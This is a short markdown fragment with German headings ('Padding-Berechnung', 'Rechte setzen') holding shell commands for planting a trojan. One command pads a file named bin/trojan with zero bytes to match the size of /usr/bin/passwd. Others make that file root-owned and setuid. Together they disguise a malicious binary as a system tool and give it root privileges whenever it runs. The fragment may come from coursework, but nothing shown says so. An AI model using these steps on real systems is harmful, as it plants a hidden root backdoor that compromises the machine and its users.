## Padding-Berechnung
```bash
dd if=/dev/zero bs=1 count="$(( $(wc -c /usr/bin/passwd | cut -d' ' -f1) - $(wc -c bin/trojan | cut -d' ' -f1) ))" | sudo tee -a bin/trojan
```

## Rechte setzen
```bash
sudo chown root bin/trojan
sudo chgrp root bin/trojan
sudo chmod u+s bin/trojan
```
